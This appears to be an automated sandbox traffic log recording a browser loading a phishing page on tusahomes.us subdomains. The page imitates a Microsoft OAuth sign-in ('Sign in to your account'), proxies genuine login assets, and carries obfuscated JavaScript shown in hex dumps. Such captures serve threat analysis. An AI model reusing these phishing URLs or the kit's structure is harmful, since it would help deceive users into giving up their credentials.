https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                                2025-04-09 00:19:04 UTC1247INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:04 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 228062
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cache-control: no-store, no-cache
                                                                pragma: no-cache
                                                                link: <https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us>; rel=preconnect; , <https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us>; rel=preconnect; ,<https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us>; rel=dns-prefetch, <https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us>; rel=preconnect; ,<https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us>; rel=dns-prefetch,<https://126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us>; rel=dns-prefetch
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                x-ms-request-id: d6b5ae06-51e8-46ea-978f-6e99d1832800
                                                                x-ms-ests-server: 2.1.20540.2 - SCUS ProdSlices
                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}
                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                x-ms-clitelem: 1,0,0,,
                                                                x-ms-srs: 1.P
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *
                                                                2025-04-09 00:19:04 UTC15137INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64
                                                                Data Ascii: <!DOCTYPE html><html class="" dir="ltr" lang="en"><head><title>Sign in to your account</title><meta content="text/html; charset=utf-8" http-equiv="Content-Type"/><meta content="IE=edge" http-equiv="X-UA-Compatible"/><meta content="width=device-wid
                                                                2025-04-09 00:19:04 UTC14483INData Raw: 32 36 75 61 69 64 3d 36 34 34 61 39 64 65 66 31 65 66 65 34 62 35 37 39 35 65 35 61 30 39 35 34 39 65 66 63 64 31 30 5c 75 30 30 32 36 6d 73 70 72 6f 78 79 3d 31 5c 75 30 30 32 36 69 73 73 75 65 72 3d 6d 73 6f 5c 75 30 30 32 36 74 65 6e 61 6e 74 3d 63 6f 6d 6d 6f 6e 5c 75 30 30 32 36 75 69 5f 6c 6f 63 61 6c 65 73 3d 65 6e 2d 55 53 5c 75 30 30 32 36 65 70 63 74 3d 50 41 51 41 42 44 67 45 41 41 41 42 56 72 53 70 65 75 57 61 6d 52 61 6d 32 6a 41 46 31 58 52 51 45 4b 55 6e 35 45 69 76 36 78 76 73 59 39 42 6c 51 57 41 6d 59 6a 4d 73 50 64 74 42 73 4a 46 45 57 48 78 68 54 75 4a 64 61 44 70 47 2d 4f 67 70 52 5f 64 35 64 62 6a 6c 32 75 66 31 74 4b 4b 7a 52 57 6a 62 4a 6d 6d 57 6a 76 57 32 4a 46 30 38 47 42 4e 54 4f 42 4e 62 5f 45 77 47 4e 44 44 6b 50 57 54 6c 4c
                                                                Data Ascii: 26uaid=644a9def1efe4b5795e5a09549efcd10\u0026msproxy=1\u0026issuer=mso\u0026tenant=common\u0026ui_locales=en-US\u0026epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEKUn5Eiv6xvsY9BlQWAmYjMsPdtBsJFEWHxhTuJdaDpG-OgpR_d5dbjl2uf1tKKzRWjbJmmWjvW2JF08GBNTOBNb_EwGNDDkPWTlL
                                                                2025-04-09 00:19:05 UTC16384INData Raw: 38 64 79 33 37 42 6c 4d 61 6b 62 30 58 78 55 39 33 75 63 53 54 5f 50 69 33 53 31 74 63 72 77 51 4c 33 35 68 63 61 4a 43 41 41 22 2c 22 63 61 6e 61 72 79 22 3a 22 6a 39 37 34 6a 72 4a 70 65 5a 67 5a 31 6c 6d 45 33 73 4c 58 30 37 37 32 62 33 64 6f 38 58 59 78 41 6f 69 34 33 38 38 33 51 59 34 3d 35 3a 31 3a 43 41 4e 41 52 59 3a 47 4b 31 61 79 74 66 64 55 49 56 73 37 44 39 37 76 59 50 6b 55 68 67 61 77 36 6e 4a 66 69 4f 6d 56 4b 32 45 70 31 6a 32 50 71 77 3d 22 2c 22 73 43 61 6e 61 72 79 54 6f 6b 65 6e 4e 61 6d 65 22 3a 22 63 61 6e 61 72 79 22 2c 22 66 53 6b 69 70 52 65 6e 64 65 72 69 6e 67 4e 65 77 43 61 6e 61 72 79 54 6f 6b 65 6e 22 3a 66 61 6c 73 65 2c 22 66 45 6e 61 62 6c 65 4e 65 77 43 73 72 66 50 72 6f 74 65 63 74 69 6f 6e 22 3a 74 72 75 65 2c 22 63 6f
                                                                Data Ascii: 8dy37BlMakb0XxU93ucST_Pi3S1tcrwQL35hcaJCAA","canary":"j974jrJpeZgZ1lmE3sLX0772b3do8XYxAoi43883QY4=5:1:CANARY:GK1aytfdUIVs7D97vYPkUhgaw6nJfiOmVK2Ep1j2Pqw=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"co
                                                                2025-04-09 00:19:05 UTC16384INData Raw: 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 2d 4d 75 43 6f 46 31 64 31 5a 68 50 76 48 6b 58 70 6d 65 77 55 51 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 6e 26 26 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 65 72 72 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 75 6c 6c 21 3d 3d 65 2e 74 61 72 67 65 74 26 26 22 63 64 6e 22 3d 3d 3d 65 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74
                                                                Data Ascii: ript><script nonce="-MuCoF1d1ZhPvHkXpmewUQ" type="text/javascript">//<![CDATA[!function(t,e){!function(){var n=e.getElementsByTagName("head")[0];n&&n.addEventListener&&(n.addEventListener("error",function(e){null!==e.target&&"cdn"===e.target.getAttribut
                                                                2025-04-09 00:19:05 UTC16384INData Raw: 21 3d 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 22 70 72 6f 74 6f 74 79 70 65 22 2c 7b 76 61 6c 75 65 3a 34 32 2c 77 72 69 74 61 62 6c 65 3a 21 31 7d 29 2e 70 72 6f 74 6f 74 79 70 65 7d 29 29 7d 2c 33 39 33 33 3a 28 74 2c 72 2c 65 29 3d 3e 7b 76 61 72 20 6e 3d 65 28 38 34 37 33 29 2c 6f 3d 65 28 35 35 37 38 29 2e 52 65 67 45 78 70 3b 74 2e 65 78 70 6f 72 74 73 3d 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6f 28 22 2e 22 2c 22 73 22 29 3b 72 65 74 75 72 6e 21 28 74 2e 64 6f 74 41 6c 6c 26 26 74 2e 74 65 73 74 28 22 5c 6e 22 29 26 26 22 73 22 3d 3d 3d 74 2e 66 6c 61 67 73 29 7d 29 29 7d 2c 33 39 39 34 3a 28 74 2c 72 2c 65 29 3d 3e 7b 76 61 72 20 6e 3d 65 28 39 31 30 35
                                                                Data Ascii: !==Object.defineProperty((function(){}),"prototype",{value:42,writable:!1}).prototype}))},3933:(t,r,e)=>{var n=e(8473),o=e(5578).RegExp;t.exports=n((function(){var t=o(".","s");return!(t.dotAll&&t.test("\n")&&"s"===t.flags)}))},3994:(t,r,e)=>{var n=e(9105
                                                                2025-04-09 00:19:05 UTC16384INData Raw: 38 33 32 34 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 28 74 2e 6c 65 6e 67 74 68 29 7d 7d 2c 37 30 39 35 3a 28 74 2c 72 2c 65 29 3d 3e 7b 76 61 72 20 6e 3d 65 28 31 29 2c 6f 3d 65 28 35 32 39 30 29 2c 69 3d 65 28 35 38 33 35 29 2e 66 2c 61 3d 6e 28 22 75 6e 73 63 6f 70 61 62 6c 65 73 22 29 2c 75 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 3b 76 6f 69 64 20 30 3d 3d 3d 75 5b 61 5d 26 26 69 28 75 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 6f 28 6e 75 6c 6c 29 7d 29 2c 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 75 5b 61 5d 5b 74 5d 3d 21 30 7d 7d 2c 37 32 35 35 3a 28 74 2c 72 2c 65 29 3d 3e 7b 76 61 72 20 6e 3d 65 28 31 38 33 31 29 3b 74 2e 65
                                                                Data Ascii: 8324);t.exports=function(t){return n(t.length)}},7095:(t,r,e)=>{var n=e(1),o=e(5290),i=e(5835).f,a=n("unscopables"),u=Array.prototype;void 0===u[a]&&i(u,a,{configurable:!0,value:o(null)}),t.exports=function(t){u[a][t]=!0}},7255:(t,r,e)=>{var n=e(1831);t.e
                                                                2025-04-09 00:19:05 UTC16384INData Raw: 76 65 72 27 2c 27 72 65 64 69 72 65 63 74 5f 75 72 6c 27 2c 27 44 65 6e 6f 27 2c 27 74 72 75 6e 63 27 2c 27 72 65 6c 65 61 73 65 4c 6f 63 6b 27 2c 27 6e 54 74 51 48 27 2c 27 68 69 64 64 65 6e 27 2c 27 33 37 34 37 36 39 32 52 44 72 50 59 75 27 2c 27 7a 50 74 47 6e 27 2c 27 4d 79 5a 47 47 27 2c 27 63 68 61 72 41 74 27 2c 27 48 6c 4d 66 46 27 2c 27 65 78 63 6c 75 64 65 64 53 74 61 74 75 73 43 6f 64 65 73 27 2c 27 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5c 78 32 30 69 73 5c 78 32 30 6e 6f 74 5c 78 32 30 64 65 66 69 6e 65 64 2e 27 2c 27 74 6f 70 27 2c 27 27 2c 27 73 6c 69 63 65 27 2c 27 73 65 74 54 69 6d 65 6f 75 74 27 2c 27 5f 5f 61 77 61 69 74 65 72 27 2c 27 73 70 65 63 69 65 73 27 2c 27 41 79 73 47 66 27 2c 27 5f 65 78 65 63 75 74 65 27 2c 27 66 51 6f
                                                                Data Ascii: ver','redirect_url','Deno','trunc','releaseLock','nTtQH','hidden','3747692RDrPYu','zPtGn','MyZGG','charAt','HlMfF','excludedStatusCodes','Symbol.iterator\x20is\x20not\x20defined.','top','','slice','setTimeout','__awaiter','species','AysGf','_execute','fQo
                                                                2025-04-09 00:19:05 UTC16384INData Raw: 78 32 32 37 29 5d 29 2c 79 61 5b 76 47 28 30 78 32 63 62 29 5d 3b 7d 7d 29 3b 7d 2c 30 78 36 61 32 3a 28 79 6d 2c 79 41 2c 79 42 29 3d 3e 7b 76 61 72 20 76 49 3d 61 30 76 3b 69 66 28 76 49 28 30 78 32 38 63 29 21 3d 3d 76 49 28 30 78 32 38 63 29 29 7b 76 61 72 20 79 44 3d 74 68 69 73 5b 27 70 61 72 74 69 61 6c 4f 62 73 65 72 76 65 72 27 5d 3b 69 66 28 79 44 5b 27 6e 65 78 74 27 5d 29 74 72 79 7b 79 44 5b 76 49 28 30 78 33 64 63 29 5d 28 72 4d 29 3b 7d 63 61 74 63 68 28 79 63 29 7b 72 55 28 79 63 29 3b 7d 7d 65 6c 73 65 7b 76 61 72 20 79 4a 3d 79 42 28 30 78 31 32 39 61 29 3b 79 6d 5b 76 49 28 30 78 33 31 38 29 5d 3d 79 4a 28 5b 5d 5b 27 73 6c 69 63 65 27 5d 29 3b 7d 7d 2c 30 78 36 61 37 3a 79 6d 3d 3e 7b 76 61 72 20 76 74 3d 61 30 76 3b 69 66 28 76 74 28
                                                                Data Ascii: x227)]),ya[vG(0x2cb)];}});},0x6a2:(ym,yA,yB)=>{var vI=a0v;if(vI(0x28c)!==vI(0x28c)){var yD=this['partialObserver'];if(yD['next'])try{yD[vI(0x3dc)](rM);}catch(yc){rU(yc);}}else{var yJ=yB(0x129a);ym[vI(0x318)]=yJ([]['slice']);}},0x6a7:ym=>{var vt=a0v;if(vt(
                                                                2025-04-09 00:19:05 UTC16384INData Raw: 29 2c 79 6a 3d 79 47 28 30 78 32 35 35 35 29 2c 79 48 3d 79 6b 28 58 32 28 30 78 33 39 32 29 29 2c 79 47 3d 21 30 78 31 3b 5b 5d 5b 58 32 28 30 78 32 33 39 29 5d 26 26 28 58 32 28 30 78 33 64 63 29 69 6e 28 79 53 3d 5b 5d 5b 58 32 28 30 78 32 33 39 29 5d 28 29 29 3f 28 79 50 3d 79 6c 28 79 6c 28 79 53 29 29 29 21 3d 3d 79 6b 5b 58 32 28 30 78 31 66 33 29 5d 26 26 28 79 63 3d 79 50 29 3a 79 47 3d 21 30 78 30 29 2c 21 79 61 28 79 63 29 7c 7c 79 75 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 58 33 3d 58 32 2c 79 56 3d 7b 7d 3b 72 65 74 75 72 6e 20 79 63 5b 79 48 5d 5b 58 33 28 30 78 31 61 34 29 5d 28 79 56 29 21 3d 3d 79 56 3b 7d 29 3f 79 63 3d 7b 7d 3a 79 6a 26 26 28 79 63 3d 79 57 28 79 63 29 29 2c 79 7a 28 79 63 5b 79 48 5d 29 7c 7c 79 77 28 79 63 2c
                                                                Data Ascii: ),yj=yG(0x2555),yH=yk(X2(0x392)),yG=!0x1;[][X2(0x239)]&&(X2(0x3dc)in(yS=[][X2(0x239)]())?(yP=yl(yl(yS)))!==yk[X2(0x1f3)]&&(yc=yP):yG=!0x0),!ya(yc)||yu(function(){var X3=X2,yV={};return yc[yH][X3(0x1a4)](yV)!==yV;})?yc={}:yj&&(yc=yW(yc)),yz(yc[yH])||yw(yc,
                                                                2025-04-09 00:19:05 UTC16384INData Raw: 6f 6e 28 29 7b 7d 29 3b 7d 3b 69 66 28 28 79 56 5b 4f 78 28 30 78 33 36 62 29 5d 3d 7b 7d 29 5b 79 6c 5d 3d 79 4b 2c 21 28 79 77 3d 79 56 5b 4f 78 28 30 78 32 35 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 69 6e 73 74 61 6e 63 65 6f 66 20 79 4b 29 29 72 65 74 75 72 6e 21 30 78 30 3b 7d 72 65 74 75 72 6e 21 28 79 47 7c 7c 27 42 52 4f 57 53 45 52 27 21 3d 3d 79 75 26 26 4f 78 28 30 78 33 39 38 29 21 3d 3d 79 75 7c 7c 79 6b 29 3b 7d 29 3b 79 6d 5b 4f 59 28 30 78 33 31 38 29 5d 3d 7b 27 43 4f 4e 53 54 52 55 43 54 4f 52 27 3a 79 6a 2c 27 52 45 4a 45 43 54 49 4f 4e 5f 45 56 45 4e 54 27 3a 79 6b 2c 27 53 55 42 43 4c 41 53 53 49 4e 47 27 3a 79 77 7d 3b 7d 2c 30 78 31 35 63 61 3a 66 75 6e 63 74 69 6f 6e 28 79 6d 2c 79 41 2c 79 42 29 7b 76 61 72 20 4f 67 3d
                                                                Data Ascii: on(){});};if((yV[Ox(0x36b)]={})[yl]=yK,!(yw=yV[Ox(0x256)](function(){})instanceof yK))return!0x0;}return!(yG||'BROWSER'!==yu&&Ox(0x398)!==yu||yk);});ym[OY(0x318)]={'CONSTRUCTOR':yj,'REJECTION_EVENT':yk,'SUBCLASSING':yw};},0x15ca:function(ym,yA,yB){var Og=


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.549744137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:02 UTC1592OUTGET /favicon.ico HTTP/1.1
                                                                Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                                2025-04-09 00:19:04 UTC720INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:04 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                cache-control: private
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                x-ms-request-id: b6f82d18-3d5a-4e53-879f-547eba6b1000
                                                                x-ms-ests-server: 2.1.20465.4 - NCUS ProdSlices
                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}
                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                x-ms-srs: 1.P
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.549747137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:05 UTC715OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: text/css,*/*;q=0.1
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: style
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:07 UTC790INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:07 GMT
                                                                Content-Type: text/css
                                                                Content-Length: 20410
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Fri, 08 Nov 2024 04:59:25 GMT
                                                                etag: 0x8DCFFB21E496F3A
                                                                x-ms-request-id: 8a7dc760-301e-0057-308c-a51ada000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001907Z-1686b48456flhmqvhC1SJCz1s80000000cyg00000000mxwu
                                                                x-fd-int-roxy-purgeid: 0
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:07 UTC15594INData Raw: 1f 8b 08 00 00 00 00 00 00 ff ed 7d 6b 93 db 36 b2 e8 77 ff 0a ee a4 52 eb c9 4a 8c 48 3d 47 53 49 ad e3 78 93 39 c7 af b2 9d 7d 54 2a b5 c5 91 a8 11 8f 29 51 97 a4 66 3c ab a3 ff 7e f1 46 03 68 90 d4 78 b2 d9 7b 2b eb 8d 2d a2 1b 0d a0 d1 68 a0 81 6e e0 eb af fe 10 3c 2f 76 f7 65 76 b3 ae 83 a7 cf cf 83 57 d9 a2 2c aa 62 55 93 f4 72 57 94 49 9d 15 db 30 78 96 e7 01 43 aa 82 32 ad d2 f2 36 5d 86 c1 57 5f 7f fd d5 1f 9e f4 bb ff 2f 78 ff e1 d9 bb 0f c1 9b bf 04 1f 7e bc 7a f7 7d f0 96 7c fd 23 78 fd e6 c3 d5 f3 17 41 67 2a 4f 9e 7c 58 67 55 b0 ca f2 34 20 ff 5e 27 55 ba 0c 8a 6d 50 94 41 b6 5d 88 5a a7 55 b0 21 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 b4 21 cf aa 9a 64 ba 4e f3 e2 2e 78 4a c8 95 cb e0 6d 52 d6 f7 c1 d5 db f3 30 f8 40 70 0b d2
                                                                Data Ascii: }k6wRJH=GSIx9}T*)Qf<~Fhx{+-hn</vevW,bUrWI0xC26]W_/x~z}|#xAg*O|XgU4 ^'UmPA]ZU!Y:ve?!dN.xJmR0@p
                                                                2025-04-09 00:19:07 UTC4816INData Raw: 78 ce 2b 2b 6e 13 d6 17 0b 8b ca ba c2 a2 2a 8b 88 bd ac 2c 12 31 2f 2a 2b 24 e5 a1 95 75 9e df 51 bb 5f 6a 19 63 dc bc c9 45 89 b5 70 47 5d 70 ca fb 9e 0e 20 56 49 be 20 69 14 01 46 49 a3 08 a2 a9 10 de 51 33 ab ab 42 ad 3a 03 51 82 c9 86 58 21 80 b6 66 35 88 5b 0b 1a d2 44 af 18 0e 06 e3 65 32 71 db a4 25 ce 20 03 a5 0f 01 b4 b6 c9 2f 95 2d 68 58 9b 7c d2 ca db f4 30 61 ec 73 a7 f6 1e b8 a8 5b 0e 36 f1 85 8e 36 04 a6 86 1b 02 93 e3 0d 14 66 70 df 93 6e 56 08 83 b4 76 40 43 45 db f0 b0 2e 10 57 99 1b 46 0a 7a 9a 6c 5e eb 5b 91 85 43 fa 34 bc 98 9d 23 97 02 03 20 96 48 ba 89 37 5f 87 50 e3 87 e3 60 22 80 5b d9 23 19 93 28 7f 18 bb 0c ee 13 f6 9e b3 cc 4f 7d b0 93 e5 be fa 81 1c e1 db 81 87 f8 c3 85 9e 97 26 d9 ad e4 e2 f9 d0 f9 26 d9 66 bb 7d ce d8 eb 5e
                                                                Data Ascii: x++n*,1/*+$uQ_jcEpG]p VI iFIQ3B:QX!f5[De2q% /-hX|0as[66fpnVv@CE.WFzl^[C4# H7_P`"[#(O}&&f}^


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.549748137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:05 UTC692OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_JXiTFACSOROsZgtGRJo1aA2.js HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:08 UTC813INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:08 GMT
                                                                Content-Type: application/x-javascript
                                                                Content-Length: 123878
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Mon, 24 Mar 2025 19:22:05 GMT
                                                                etag: 0x8DD6B0929AA7EF6
                                                                x-ms-request-id: bfbf2eeb-301e-0070-77b6-a87aa1000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001907Z-1686b48456f4bbfvhC1SJC1f840000000csg00000000da3u
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
